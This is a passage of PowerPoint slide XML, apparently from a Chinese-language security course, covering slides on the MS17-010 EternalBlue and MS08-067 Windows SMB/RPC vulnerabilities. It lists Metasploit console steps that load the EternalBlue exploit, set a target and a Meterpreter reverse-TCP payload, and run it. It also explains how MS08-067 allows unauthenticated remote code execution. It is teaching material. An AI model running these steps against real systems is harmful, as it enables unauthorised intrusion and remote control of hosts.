        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2707052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5B0B1E3-1854-3454-5027-3E4B8A77C38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="890347" y="1255275"/>
            <a:ext cx="7895137" cy="2327169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C516F6-E2D8-08A2-276D-5E403ACFF662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="802665" y="3921286"/>
            <a:ext cx="7765138" cy="2122414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BF26CBC-E5A0-1278-1526-C6B47586F559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9073862" y="2239108"/>
            <a:ext cx="2762392" cy="3632387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73D91F4-823E-2BDF-87ED-8E8A780B45CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42348095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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662963" y="1687026"/>
            <a:ext cx="11356121" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/smb_ms17_010    &gt;use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/ms17_010_eternalblue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> IP                                                     &gt;set payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;exploit                                                              &gt;set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>                                                                            &gt;exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>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787" y="5376469"/>
            <a:ext cx="10408294" cy="857699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99646" y="4155311"/>
            <a:ext cx="613141" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>一</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>步</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5727883" y="4155311"/>
            <a:ext cx="613141" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>二步</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20729920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582CF44-B881-D599-E6A1-A2FFB63C71E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33A8C16-BDE8-2762-9862-A1B09F19FEB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="1153617"/>
            <a:ext cx="11176664" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>远程溢出漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms08_067_netapi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>（攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>系统）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BDDF01-1473-1B81-22D5-49CA94B0C962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688723" y="2284967"/>
            <a:ext cx="10527917" cy="3586366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    MS08-067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞全称是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求缓冲区溢出漏洞”，攻击者利用受害者主机默认开放的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，发送特殊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Remote Procedure Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    当用户在受影响的系统上收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求时，该漏洞会允许远程执行代码，攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时，该漏洞可以用于蠕虫攻击。它影响了某些旧版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统，包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows 2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows Server 2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3523707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C296C21-52D9-134A-A6DB-71F69FBE7424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A6A4FF1-91CB-9F68-245E-D333A0427B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="1153617"/>
            <a:ext cx="11176664" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>远程溢出漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms08_067_netapi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A481A9-9E8F-1A0E-2884-456A760D1C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586980" y="1946871"/>
            <a:ext cx="7830537" cy="4592043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1769684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59026" y="1120527"/>
            <a:ext cx="10972800" cy="931012"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
